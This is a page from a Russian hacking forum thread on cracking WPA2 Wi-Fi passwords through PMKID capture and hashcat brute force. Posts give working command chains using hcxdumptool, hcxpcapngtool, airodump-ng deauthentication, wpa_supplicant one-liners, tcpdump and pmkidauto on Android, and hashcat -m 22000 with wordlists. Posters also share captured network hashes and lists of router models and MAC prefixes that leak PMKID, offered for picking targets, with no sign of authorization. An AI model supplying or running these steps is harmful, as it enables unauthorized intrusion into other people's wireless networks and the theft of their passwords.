PDA

Просмотр полной версии : Брут WPA2 без handshake используя PMKID + hashcat


Страницы : 1 [2]

Mistral
29.09.2020, 15:23
При каждом запуске hcxdumptool, PMKID меняется, разве ключ WPA не постоянный?



ключ постоянный,но изменяются другие данные,например,MAC клиента

PSYDRUGS
29.09.2020, 16:36
Разобрался. Второе и третье поле уже есть, имя точки можно не декодировать, hcxdumptool выдаёт уже в готовом виде.

Таким образом правильный PMKID у меня получился: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802 f8209cd0*mgts_85

WPR его приняла, но 4ое поле SSID, нужно вбивать вручную, программа его не подхватывает, видимо нужна в зашифрованном виде.

Проверил PMKID с заранее известным паролем, при описанных выше манипуляциях WPR выдала совпадение PMK и PMKID. Метод работает.

Mistral
29.09.2020, 17:51
имя точки можно не декодировать






mgts_85






но 4ое поле SSID, нужно вбивать вручную, программа его не подхватывает, видимо нужна в зашифрованном виде.



SSID в HEX формате

http://www.unit-conversion.info/texttools/hexadecimal/

mgts_85

>

6d6774735f3835

PSYDRUGS
29.09.2020, 22:19
Заметил последние AP мгтс_гпон и ростелеком с MAK 10:A3:*, PMKID не отдает, не отдают любые Кинетики и Тп-Линк, современные Д-Линки.

Утилита иногда выдает символы с подзаголовком PMKIDROGUE, как я понимаю этот набор нельзя рассматривать как полноценный PMKID или можно?

bravephoenix748
03.10.2020, 18:23
Aircrack-ng, к сожалению, не проверяет PMKID на валидность, то есть не состоит ли он из нулей; это здесь обсуждалось.

С тех пор, как я узнал, что PMKID можно ловить без режима мониторинга, всегда ловлю его так и проблем не знаю.



Немного не так -короче те точки которые отдавали валидный PMKID с помощью aircrack-ng также отдают также валидный

PMKID с помощью вашей команды

wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1

а те что не давали валидного с aircrack-ng дают тоже самое

http://i-fotki.info/26/b585698e7f49b11eb67ed8778ff037896dad6e384394616.pn g.html

larinvlad
09.11.2020, 17:23
Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery?

Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?

В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802 f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.

Mistral
09.11.2020, 17:33
Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery?

Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?

В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802 f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.



https://forum.antichat.ru/threads/464369/page-2#post-4238069

4Fun
09.11.2020, 18:10
Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?



Вы получили строку с PMKID (требуется удалить пробелы). Вам нужно знать ESSID и BSSID точки доступа, а также MAC-адрес вашей беспроводной карты. Последний можно узнать командой:


iw dev
Из BSSID, MAC удаляете разделители, а ESSID преобразовываете в HEX с помощью сервиса.

Затем просто составляете строку формата:

pmkid*bssid*mac*essid

и записываете в файл с расширением .16800, который можно скормить Hashcat.

WiFiPR: находите конструктор PMKID и заполняете поля этими данными.

bravephoenix748
11.11.2020, 17:41
Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery?

Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?

В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802 f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.



Если только в Wireless Password Recovery то проще с помощью конструктороа PMKID.

https://www.passcape.com/wireless_password_recovery_pmkid_constructor_rus

А если c помощью aircrack-ng ловите PMKID вставляетсая как и хендшейк в виде .cap файла

AMAC это точка доступа ,а SMAC это ваш адаптер.Обратие внимание если у вас стоит в /etc/NetworkManager/conf.d/mac.conf

как в Porteuse по умолчанию(клонирование мас)



wifi.cloned-mac-address=stable то тот котрый был в момент подклбчения...

4Fun
11.11.2020, 23:38
А если c помощью aircrack-ng ловите PMKID вставляетсая как и хендшейк в виде .cap файла



Важное замечание: в Aircrack-ng 1.6 добавлена возможность подавать PMKID как строку:


aircrack-ng -I "a33b5ba86374d241ab527a500124789b*c4c9ec10d0d2*acde 489a876d*522d6c696e65" -w /path/to/dictionary

erwerr2321
23.01.2021, 16:54
@4Fun (https://forum.antichat.xyz/members/324235/), прив!

Скажи, а есть где более-менее полный список устройств отдающих PMKID, по типу твоего для Pixie-Dust!?

Не помешало бы его или ссылку на него добавить в шапку, да и твой тоже в соответствующей теме!

4Fun
23.01.2021, 16:58
Скажи, а есть где более-менее полный список устройств отдающих PMKID, по типу твоего для Pixie-Dust!?



Наработки в этом направлении есть, но полноценного списка нет. Собирал данные (BSSID, в первую очередь) с wpa-sec.stanev.org, с темы перебора на этом форуме. В планах насобирать большое количество различных BSSID и обобщить этот список в список шаблонов (можно сказать, регулярных выражений или масок).

Af5G4337
04.03.2021, 11:31
Всем доброго!

Пытаюсь проводить мероприятия в данном направлении. Поступаю так. Обычным аирслаксом сканирую сети, выбираю интересующую, включаю перехват и если клиентов нет, то просто пытаюсь подключиться с другого устройства. Потом смотрю акулой захваченный сар файл и всю необходимую инфу оттуда выцепляю. Заметил некоторую особенность, а именно:

1. некотрые точки легко отдают все, мне необходимые, данные включая рмк

2. некоторые вообще не отдают ни одного еапол пакета, хоть тресни.

3. некоторые отдают рмк с номером 0400000000000000.....

4. а вот некоторые, сперва молчат ка рыба об лед, а потом отдают валидный рмк но совсем не с первого, а с пятого - десятого подключения.

Четвертый пункт мне показался интересным, сразу скажу, что все происходит с нормальным или хорошим уровнем сигнала, дальнобоем вообще не интересуюсь.

Absolum
05.03.2021, 22:48
Наверное тут на форуме было это уже много раз тут. Но я лично не читал пока что про прогу CommView


В ролике довольно быстро и просто вроде бы поймал - Pmkid:

Конектился к wi-fi точке - с Любым паролем

Extract PMKID On Windows Using CommView To Be Used On HashCat - YouTube

Alexmeh
05.03.2021, 23:30
Конектился к wi-fi точке - с Любым паролем



Получилось?

CommView - отстой!!!

Absolum
05.03.2021, 23:58
Получилось?

CommView - отстой!!!


он в ролике коннектился с Произвольным паролем. У него вроде получилось. посмотрите ролик

erwerr2321
06.03.2021, 00:01
CommView





посмотрите ролик



Использовать это поделие и тем более рекомендовать его кому-либо, тут считается моветоном!

Absolum
07.03.2021, 07:52
Я протестил захват PMKID с помощью aircrack-ng-не всё так плохо.WifiSlax 4.12 программа WifiMetrropolis



а ты не знаешь, что делать с этим Key , который мне выдала прога (или роутер ? ) на вкладке Other в WifiSlax 4.12 в программе WifiMetrropolis 3 ?

это вообще что за аттака ? по wps ?

попробовал с этим кеем приконнектиться к wi-fi - Tenda_E39820 - не коннектиться.

потом попробовал его ввести как wps ключ и потом скан по wps через Reaver (в Airslax 5.14 pro) - но тишина.

https://clip2net.com/s/4bd9hR8

dart8888
30.05.2021, 03:06
да странно что в терминале часто при поимке хш вылазит типа "обнаружен мпкид" - по сути то одно и тоже? но отдельно не записывает (( печалька.

bravephoenix748
30.05.2021, 19:51
http://f26.ifotki.info/thumb/6194f573e5997ebc428d0c7ae39634a55e19a9405049245.pn g

Я начинаю ловить PMKID cначала WifiMetropolis тк сразу получается PMKID в формате cap и его можно вставить сразу в WPR не извлекая вручную.Также сразу можно проверить на валидность пойманный PMKID нажав кнопку Aircrack-ng -там сразу видно валидный он или нет.

Короче очень быстро ловится или если не ловится то понимаешь что он вообще не поймается тк нет клиентов.Тогда переходите к способу

wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1


Короче как выбрали целевую точку при сканировании- есть клиенты или нет сразу глушите точку- нажимайте кнопку DesAutenticacion(которая крайне правая и красная)

Если клент есть он появится через 5-10 сек.Если нет то он и не появится.Наверное aircrack-ng скачет по каналам и не всегда видит клиентов.А тут когда сканируете на отельном канале то они появляются бытро.Если есть клиенты то нажимайте DesAutenticacion(левая чёрная)

Естественно aircrack-ng 1.6 должен быть установлен.Кстати пользуюсь Wifislax 4.12 XFCE поздние версии KDE а это вроде зло

http://f26.ifotki.info/thumb/8bda1ebb09f26b7decf417bebeae64d55e19a9405050286.pn g

Кстати разработчики Kali наконец-то по умолчанию ставаят самое нормальное окружение XFCE

Kevin Shindel
15.09.2021, 23:16
Ребята помогите распарсить файлик.

Запустил так ...


hcxdumptool -i wlan0 --disable_disassociations -o test.pcapng --enable_status=15
потом сконвертил в новый формат.


hcxpcapngtool -o test.22000 test.pcapng
на выходе файлик test.22000, содержание вида:


WPA*02*245863d2dde9eef882993e5ff83a5478*18a6f7f88e 50*ec6c9a674ef2*554b7274656c65636f6d5f463838453530 *4ac1b5a688571792942695c66f672a836534df844ced1f8c3 0b926aaff75a233*0103007502010a00000000000000000002 a86bec58dc2aa88e46c404401b77d0ba37e84dc1c7bfe6b3ed bac79a7786c931000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000001630140100000fac040100000fac040100000f ac020000*02
WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ec ae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212 809c9929a40a94cfe6fe8161d101a42e4030563*0103007502 010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c8 1964faa7f44076fc40150affcb58b5ba3bbfb3000000000000 00000000000000000000000000000000000000000000000000 0000000000000000000000000000000000001630140100000f ac040100000fac040100000fac028000*02
WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ec ae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707 282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02 030a001000000000000000027f0a607246336a6fe230e192fe f5876b835b07dba5572c7760baf54993a68501000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000*05
Вопрос кто подскажет что в этой строке нужное ... я так понимаю тут несколько сетей.

Как определить какая из них какая ?

antis17
15.09.2021, 23:53
WPA*02*245863d2dde9eef882993e5ff83a5478*18a6f7f88e 50*ec6c9a674ef2*554b7274656c65636f6d5f463838453530 *4ac1b5a688571792942695c66f672a836534df844ced1f8c3 0b926aaff75a233*0103007502010a00000000000000000002 a86bec58dc2aa88e46c404401b77d0ba37e84dc1c7bfe6b3ed bac79a7786c931000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000001630140100000fac040100000fac040100000f ac020000*02
WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ec ae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212 809c9929a40a94cfe6fe8161d101a42e4030563*0103007502 010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c8 1964faa7f44076fc40150affcb58b5ba3bbfb3000000000000 00000000000000000000000000000000000000000000000000 0000000000000000000000000000000000001630140100000f ac040100000fac040100000fac028000*02

Вопрос кто подскажет что в этой строке нужное ... я так понимаю тут несколько сетей.

Как определить какая из них какая ?



HEX > ASCII

554b7274656c65636f6d5f463838453530 - UKrtelecom_F88E50

56696b61 - Vika

Kevin Shindel
16.09.2021, 10:18
Тут получаются разные хэши изза того что разные маки использовались для конекшена... уже понял.


WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ec ae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212 809c9929a40a94cfe6fe8161d101a42e4030563*0103007502 010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c8 1964faa7f44076fc40150affcb58b5ba3bbfb3000000000000 00000000000000000000000000000000000000000000000000 0000000000000000000000000000000000001630140100000f ac040100000fac040100000fac028000*02
WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ec ae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707 282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02 030a001000000000000000027f0a607246336a6fe230e192fe f5876b835b07dba5572c7760baf54993a68501000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000*05
Спасибо большое!

Kevin Shindel
18.09.2021, 22:53
Еще вопрос как запустить софтину на 5 герцах?

Указывать каналы через запятую как то не очень...

Slayer
14.11.2021, 14:17
Кто подскажет - ловил хэндшейк по обыкновению с помощью airodump-ng, точка была без клиентов - наконец появился, решил воспользоваться случаем - airodump-ng выдал сначала сообщение о пойманном pmkid, потом о пойманном хэндшейке (раньше только о хэндшейке сообщал - недавно обновлял арч, видимо новое), cap конвертировал через сайт hashcat в hc22000, ниже содержание файла. Т.е. понятно, обе записи для одного реального клиента (мак один и тот-же) - первая pmkid, вторая - pmkid+хэндшейк, смущает то, что поле pmkid отличается - разве для одного и того-же клиента оно не должно совпадать? Т.е. одна из записей вероятно не валидна?

WPA*01*ad311cb09a62909eababf5a2e04344f1*749d79ac13 7a*50b7c3d07526*52542d47504f4e2d31333741***

WPA*02*8d169d6c8ca1273778c20d6367cfa496*749d79ac13 7a*50b7c3d07526*52542d47504f4e2d31333741*aa43069a2 bc750549cab7cf0a25dbcb33887b46717a152995f2b8a29309 910d0*0103007502010a00000000000000000000d0759f5923 8553ad392c083f180e3fece37867f9c48d6be17c4b6da316da 42c20000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 001630140100000fac020100000fac040100000fac023c00*a 2

Payer
14.11.2021, 15:58
Т.е. одна из записей вероятно не валидна?



pmkid годен у двух записей.

Просто пароль там сложный и долго нужно перебирать.

Вы уж если ведете речь о пойманном хэндшейке так и выклажывайте его, а не огрызки обработки.

Хотя тут и так ясно.

Slayer
14.11.2021, 16:52
pmkid годен у двух записей.

Просто пароль там сложный и долго нужно перебирать.

Вы уж если ведете речь о пойманном хэндшейке так и выклажывайте его, а не огрызки обработки.

Хотя тут и так ясно.



Я именно в этой теме спросил, т.к. хотел уточнить про разные pmkid у одного и того же клиента - про пароль в курсе, выложил недавно в платную тему, но за такое (31^8) вряд ли кто возьмётся. Просто там пост с пойманным отдельно pmkid в hcxdumptool (не было клиентов), хотелось удостоверится что он не левый получился (т.е. разные - это нормально). А почему разные у одного клиента (про пост выше)? - я думал он рассчитывается исходя из мак точки, мак клиента имени точки и пароля wpa (я просто в хэшах не особо, вероятно ещё какакая-то информация подмешивается?).

VasiliyP
14.11.2021, 17:41
А почему разные у одного клиента (про пост выше)? - я думал он рассчитывается исходя из мак точки, мак клиента имени точки и пароля wpa (я просто в хэшах не особо, вероятно ещё какакая-то информация подмешивается?).





PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR

PROTOCOL = Fixed string "WPA"
TYPE = 01 for PMKID, 02 for EAPOL
PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
MACAP = MAC of AP
MACCLIENT = MAC of CLIENT
ESSID = network name (ESSID) in HEX
ANONCE = ANONCE
EAPOL = EAPOL (SNONCE is in here)
MESSAGEPAIR = Bitmask:

WPA*01*... - Вот этот только PMKID

Slayer
14.11.2021, 18:11
PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR

PROTOCOL = Fixed string "WPA"
TYPE = 01 for PMKID, 02 for EAPOL
PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
MACAP = MAC of AP
MACCLIENT = MAC of CLIENT
ESSID = network name (ESSID) in HEX
ANONCE = ANONCE
EAPOL = EAPOL (SNONCE is in here)
MESSAGEPAIR = Bitmask:

WPA*01*... - Вот этот только PMKID



Вот, спасибо оно ) - теперь ясно - варьируется PMKID/MIC, и не подумаешь.

Ещё хотел такой своеобразный вопрос задать - нельзя ли в hcxdumptool задать мак фейкового клиента (которого она "подключает")? - просто эксперимент хочется провести с одним и тем-же клиентом - в хэлпе вроде как нет такого, т.е. по умолчанию каждый раз новый генерируется.

VasiliyP
14.11.2021, 20:45
нельзя ли в hcxdumptool задать мак фейкового клиента (которого она "подключает")?



Только код править, вот строчки, где он рандомизируется https://github.com/ZerBea/hcxdumpto...650a6d38b356319f697/hcxdumptool.c#L8084-L8091

Можно забить туда константы. Только не забудьте, что первый байт MAC нельзя "от балды" ставить.

А проще и быстрее подключаться самому, с другого клиента. В телефон можно вбить любой пароль, и подключаться.

Slayer
14.11.2021, 20:47
Только код править, вот строчки, где он рандомизируется https://github.com/ZerBea/hcxdumpto...650a6d38b356319f697/hcxdumptool.c#L8084-L8091

Можно забить туда константы. Только не забудьте, что первый байт MAC нельзя "от балды" ставить.

А проще и быстрее подключатся самому, с другого клиента. В телефон можно вбить любой пароль, и подключаться.



Ок, спасибо.

-Shake-
06.01.2022, 19:09
PMKD захвачен на обычном андроиде, при подключении к сети, tcpdump-ом:"



картинка в посте пропала.

Я правильно понимаю, что tcpdump не пишет никаких слов/сообщение, что пойман pmkid?

это только при анализе дампа (в акуле, например) можно узнать?

VasiliyP
06.01.2022, 20:02
Я правильно понимаю, что tcpdump не пишет никаких слов/сообщение, что пойман pmkid?



Не пишет. Но, сколько я видел этих пакетов, pmkid всегда в конце. Поэтому, можно распечатать содержимое первого пакета (ключ -x), если там не нули в конце, это оно. Ну, или смотреть специализированным софтом.

goginnm12
01.02.2022, 22:15
Собирал данные (BSSID, в первую очередь)



развлекаюсь ваншотом (встроенная в телефон карта не всё может). он в лог сохраняет только имя, мак, пин и пас. если есть команда добавляющая данные, которые возвращает устройство "о себе" готов по возможности выгулять его)

что б два раза не вставать:

PMKID на android при помощи tcpdump

1. установить tcpdump (для termux)

pkg install tcpdump

2. запустить команду:

sudo tcpdump -nei wlan0 -s0 -xx -vv -w PMKID_$(date +"%Y-%m-%d-%H:%M:%S").cap

3. подключиться с любым паролем (например 11111111) к точке(ам), контролировать получение пакетов в терминале

4. прервать экзикуцию, обработать полученный файл

dwais
02.02.2022, 23:49
Доброго дня. Подскажите знающие рабочий способ на сегодняшний день получить PMKID.

Например через VMware.

erwerr2321
03.02.2022, 00:01
Доброго дня. Подскажите знающие рабочий способ на сегодняшний день получить PMKID.

Например через VMware.



Да способ вроде прежний, инициируете подключение с произвольным паролем, и смотрите в EAPOL пакете ( 1 of 4 ) отдала ли точка PMKID.

А точки либо не отдают его вообще, либо отдают с нулевым значением, либо отдают годный к перебору PMKID.

Для VMware скорее всего вам потребуется внешний WiFi адаптер!

dwais
03.02.2022, 00:31
Да способ вроде прежний, инициируете подключение с произвольным паролем, и смотрите в EAPOL пакете ( 1 of 4 ) отдала ли точка PMKID.

А точки либо не отдают его вообще, либо отдают с нулевым значением, либо отдают годный к перебору PMKID.

Для VMware скорее всего вам потребуется внешний WiFi адаптер!



В общем получил вот такое. Чем-то оно полезно?

WPA*02*2c9e9eaf659a11303ea4131a8e44ebbc*50ff2061a1 97*9c28f788a1b6*4b65656e657469632d33353434*b8f5260 56bc4b4b2767d2fc22f68727617926b1b590f833a56fdc0f20 dd216da*0103007502010a00000000000000000005bbeaedad e42c4b2178ece9437158c43a493d4c69e68f619f2d5d796f87 69415000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00001630140100000fac040100000fac040100000fac020000 *00

Вот это 50ff2061a197 понятно mak, 4b65656e657469632d33353434 - это ssid. Дальше не знаю(

erwerr2321
03.02.2022, 00:48
В общем получил вот такое. Чем-то оно полезно?





WPA*02*MIC*MAC_AP*MAC_CLIENT*ESSID*NONCE_AP*EAPOL_ CLIENT*MESSAGEPAIR

а PMKID


WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID***

Взято здесь https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2

dwais
03.02.2022, 00:58
WPA*02*MIC*MAC_AP*MAC_CLIENT*ESSID*NONCE_AP*EAPOL_ CLIENT*MESSAGEPAIR

а PMKID


WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID***

Взято здесь https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2



значит PMKID не получен. Я правильно понимаю?

moz9
08.02.2022, 15:52
Чет у меня разные свистки на чипах rt3070 вешаются примерно на таких моментах. (приходится реконнектить свисток). Причем pmkid ловил через аиродамп, когда ловил хендшейк. И я подумал мб есть какой-то патченный или модифицированный драйвер под этот чип? Как-то они неочень хорошо отрабатывают по-моему...

Depris
15.05.2022, 13:45
Добрый день, друзья. Споймал PMKID, может кто - то переделать для кота. Спасибо

https://transfiles.ru/cl2g6

174region174
01.06.2022, 07:48
Чет у меня разные свистки на чипах rt3070 вешаются примерно на таких моментах. (приходится реконнектить свисток). Причем pmkid ловил через аиродамп, когда ловил хендшейк. И я подумал мб есть какой-то патченный или модифицированный драйвер под этот чип? Как-то они неочень хорошо отрабатывают по-моему...




Скорее всего этот роутер не отдаёт PMKID. А скрипт не вешается. Просто не происходит в сети ни чего нового и ему нечего обновлять по информации на мониторе. Вот и кажется будто он висит.

D9d9_tol9
26.08.2022, 18:02
Всем привет. Подскажите, пожалуйста, мой алгоритм действий правильный?

Прибиваем все лишнее и рандомизируем МАС

airmon-ng check kill

ifconfig wlan0 down

macchanger -r wlan0

ifconfig wlan0 up

Переводим карточку в режим мониторинга

airmon-ng start wlan0

Собираем общую инфу о происходящем вокруг

airodump-ng wlan0mon --wps --manufacturer --uptime --ignore-negative-one --write last_dump

Далее либо получаем PMKID либо Аэродампом, но с одного роутра

airodump-ng --bssid CC:2D:E0:AA:BB:CC -c 6 --write AP_crack wlan0mon --wps --manufacturer --uptime

либо со всех доступных

hcxdumptool -i wlan0mon -o PMKID --enable_status=1

Далее конвертируем

hcxpcapngtool -o clean_PMKID.22000 --all PMKID

Скармливаем коту файл с собранной инфой.

hashcat -m 22000 --status -w 3 clean_PMKID.22000 top1Mpassword.txt

Собственно, 2 вопроса. Правильны ли мои действия? И все ли хеши в файле clean_PMKID.22000 проверяет hashcat?

Уже начал сомневаться в правильности действий, не могу набрутить пароли...

CRACK211
22.10.2022, 22:49
Кто в курсе, как ловить pmkid с телефона ? Может софт есть ?

hydra
23.10.2022, 09:05
Кто в курсе, как ловить pmkid с телефона ? Может софт есть ?



Ищи.Где-то тут точно про это было.

CRACK211
23.10.2022, 15:44
wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1

Пробую эту команду в termux. Выдаёт такую ошибку

CANNOT LINK EXECUTABLE "wpa_passphrase": library "libcrypto.so.3" not found: needed by main executable

Как можно это исправить?

Ps. Разобрался установил это и заработало

pkg install nodejs-lts

hydra
23.10.2022, 15:49
library "libcrypto.so.3" not found



В системе либо отсутствует сама либа или она не слинкована куда нужно.Если тело рутовано,поищи поиском в / дабы убедиться в ее отсутствии.

CRACK211
23.10.2022, 15:57
Да но теперь другая проблема. Iwconfig не показывает wifi карту. Пусто (

hydra
23.10.2022, 15:59
Да но теперь другая проблема. Iwconfig не показывает wifi карту. Пусто (



Вот тут не знаю.Мож ребутнуть?

CRACK211
23.10.2022, 16:45
Вот тут не знаю.Мож ребутнуть?



Не помогло. При чем 2 телефона samsung I xiaomi . Termux не видет wifi карту

iwconfig

lo no wireless extensions.

rmnet0 no wireless extensions.

rmnet1 no wireless extensions.

Не видет и все ( и бусибокс установил и рут права дал. Не видит ( есть ещё способ ловить pmkid ?

CRACK211
23.10.2022, 23:54
Походу дела проблема в 12 Андроиде. Как написано в этой статье в 12 термукс не работает нормально и решаться с помощью. Rtfm но что такое rtfm я не понял. Подскажите пожалуйста что такое RTFM????

https://habr.com/ru/post/652633/

hydra
24.10.2022, 10:40
Rtfm но что такое rtfm я не понял.



https://www.google.com/search?q=rtfm+это

CRACK211
26.10.2022, 14:35
Всем спасибо. разобрался заработало)

CRACK211
28.10.2022, 13:29
Может кто собирает данные в таблицу

HUMAX HG100RE-AK от акадо отдаёт pmkid. Может кому пригодится

SAGEM F@ST 3686 V2.2 тоже отдаёт PMKID

Asus RT-AC88U уязвим

CRACK211
04.11.2022, 15:41
00:F8:1C:8C (HUAWEI TECHNOLOGIES CO.,LTD) тоже отдает pmkid

ловил с помощью ewsa 7.30.593

CRACK211
04.12.2022, 15:25
Новый способ ловли pmkid с Андроид (termux). Из плюсов можно сразу Брут по словарю запустить, не нужен РЕЖИМ МОНИТОРА, НЕ РАБОТАЕТ С ЗАБЛОКИРОВАННЫМ ЭКРАНОМ ТЕЛЕФОН ДОЛЖЕН БЫТЬ АКТИВНЫМ окно termux должно быть открыто. Спасибо большое @goginnm12 (https://forum.antichat.xyz/members/314403/)

sudo pip3 install --upgrade https://github.com/Sinf0r0s0/pmkid-auto/tarball/master

запуск

только сбор

sudo pmkidauto -i wlan0 -s 10 -t 20

сбор и проверка по словарю

sudo pmkidauto -i wlan0 -w tiny_wordlist.txt -s 10 -t 20

CRACK211
06.12.2022, 18:53
00f81c

1cb72c

2c4d54

382c4a

4c5e0c

8c5973

ac220b

c486e9

c85195

c8b373

cc2de0

ce2de0

d4bf7f

d4bf7f

d850e6

e03f49

fc9435

отдают pmkid

CRACK211
14.12.2022, 15:35
708bcd

cc4eec

cc3540

302478

a408f5

e03f49

MiXeyUA
23.12.2022, 22:57
Новый способ ловли pmkid с Андроид (termux). Из плюсов можно сразу Брут по словарю запустить, не нужен РЕЖИМ МОНИТОРА, НЕ РАБОТАЕТ С ЗАБЛОКИРОВАННЫМ ЭКРАНОМ ТЕЛЕФОН ДОЛЖЕН БЫТЬ АКТИВНЫМ окно termux должно быть открыто. Спасибо большое @goginnm12 (https://forum.antichat.xyz/members/314403/)

sudo pip3 install --upgrade https://github.com/Sinf0r0s0/pmkid-auto/tarball/master

запуск

только сбор

sudo pmkidauto -i wlan0 -s 10 -t 20

сбор и проверка по словарю

sudo pmkidauto -i wlan0 -w tiny_wordlist.txt -s 10 -t 20



А как отдельно запустить брут на уже найденные хэши?

CRACK211
23.12.2022, 23:26
А как отдельно запустить брут на уже найденные хэши?



sudo pmkidauto -w tiny_wordlist.txt -c

MiXeyUA
23.12.2022, 23:34
А как отдельно запустить брут на уже найденные хэши?



Разобрался. Но либо ститает так медленно либо зависает. Прогресса не видно. В файле два хеша было и словарь на 1000 паролей. Минут двадцать ждал, так ничего и не выдало.

CRACK211
23.12.2022, 23:56
Разобрался. Но либо ститает так медленно либо зависает. Прогресса не видно. В файле два хеша было и словарь на 1000 паролей. Минут двадцать ждал, так ничего и не выдало.



Медленно Брут идёт. Брут идёт на процессоре без gpu.у меня Брут идёт быстрее. Snap 8 gen 1

MiXeyUA
24.12.2022, 00:02
https://cloud.mail.ru/public/rKpn/Aa49b9avg Дождался. Очень медленно считает. У кого-нибудь есть возможность проверить хотя бы от 3WiFi словариком, если я файл с хешами скину? На руках, просто, один телефон, доступа к ББ нет.

MiXeyUA
24.12.2022, 00:15
Hash Sutie Droid перебирает этот словарь (на 1000 паролей который) со скоростью 1.2К за 2мин. 40 сек. Но ему .cap файл нужен(

CRACK211
24.12.2022, 00:43
Hash Sutie Droid перебирает этот словарь (на 1000 паролей который) со скоростью 1.2К за 2мин. 40 сек. Но ему .cap файл нужен(



Выкладывай посмотрю

MiXeyUA
24.12.2022, 01:13
Выкладывай посмотрю



У меня интернет ужастный. Даже файл весом 300kB не выгружается. Вбей в google HashSuiteDroid 1.6, там куча сайтов откуда скачать можно.

CRACK211
24.12.2022, 01:27
https://cloud.mail.ru/public/rKpn/Aa49b9avg Дождался. Очень медленно считает. У кого-нибудь есть возможность проверить хотя бы от 3WiFi словариком, если я файл с хешами скину? На руках, просто, один телефон, доступа к ББ нет.



Да я за хэш говорил . У меня есть эта программа

CRACK211
24.12.2022, 01:27
У меня интернет ужастный. Даже файл весом 300kB не выгружается. Вбей в google HashSuiteDroid 1.6, там куча сайтов откуда скачать можно.



Она в GP есть

MiXeyUA
24.12.2022, 11:27
Вот

https://transfiles.ru/bq4ou

tomili
13.01.2023, 00:00
Доброй вечер ребята как решить эту проблему ?

Hash_Cr4cker
13.01.2023, 00:02
Доброй вечер ребята как решить эту проблему ?


-m22000

tomili
13.01.2023, 00:32
-m22000



рубить. Благодарю

tkaramel
23.01.2023, 04:44
Метод отличный, многие сети поддаются.

Карты ralink и intel.

avs58
24.02.2023, 19:30
e4-26-86-Dwnet

48-ad-d8-Huawei

9c-37-f4-Huawei

отдают pmkid

C0D3BR34K3R
04.08.2023, 12:34
Добавлю, что hcxdumptool позволяет получить PMKID не только с точки доступа, но и с клиента

При конвертации с помощью hcxpcapngtool в формат 22000

MESSAGEPAIR будет равен 10

что означает, что PMKID взят с клиента


WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID***MESSAGEPAIR

Bitmask of the MESSAGEPAIR field for PMKID (WPA*01):
0: reserved
1: PMKID taken from AP
2: reserved
4: PMKID taken from CLIENT (wlan.da: possible MESH or REPEATER)
5: reserved
6: reserved
7: reserved

libvernow
15.08.2023, 05:56
бодрого утречка

дайте отклик, у кого получилось хотя бы однажды снять PMKID с Iskratel Innbox e80

хочу понять для себя, имеет ли смысл вообще пытаться, или данная модель тупо не отдаёт никогда PMKID

вот у меня лично, в течении полутора месяцев дрюченья двух таких аппаратов, ни один, ни разу, не выслал PMKID, ни косой, ни кривой

сигнал хороший, одна точка -61dBm, другая -55dBm, похоже дело явно не качестве связи

doxify
24.12.2023, 13:28
Всем привет! Возможно не совсем по теме вопрос.

